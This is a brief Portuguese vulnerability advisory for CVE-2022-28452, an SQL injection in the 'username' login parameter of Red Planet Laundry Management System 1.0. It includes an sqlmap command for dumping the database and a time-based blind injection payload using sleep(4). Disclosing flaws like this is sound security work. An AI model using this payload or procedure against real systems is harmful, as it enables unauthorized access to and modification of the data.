
CVE-2022-28452
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28452 https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-28452 https://laundry.redplanetcomputers.com/
1-Descrição:
O Red Planet Laundry Management System 1.0 é vulnerável a injeção de SQL através do parâmetro 'username' em /index.php/login/rediract . Explorar este problema pode permitir que um atacante comprometa a aplicação, acesse ou modifique dados, ou explore vulnerabilidades latentes na base de dados subjacente.
2-Prova de Conceito:
No Burpsuite, intercete o pedido da página afetada com o parâmetro 'username' e salve como poc.txt. Em seguida, execute o SQLmap para extrair os dados da base de dados: sqlmap.py -r poc.txt --dbms=mysql
3-Exemplo de payload:
A entrada POST codificada em URL com o campo 'username' foi definida como 0'XOR(if(now()=sysdate(),sleep(4),0))XOR'Z
Detalhes de contato: [email protected]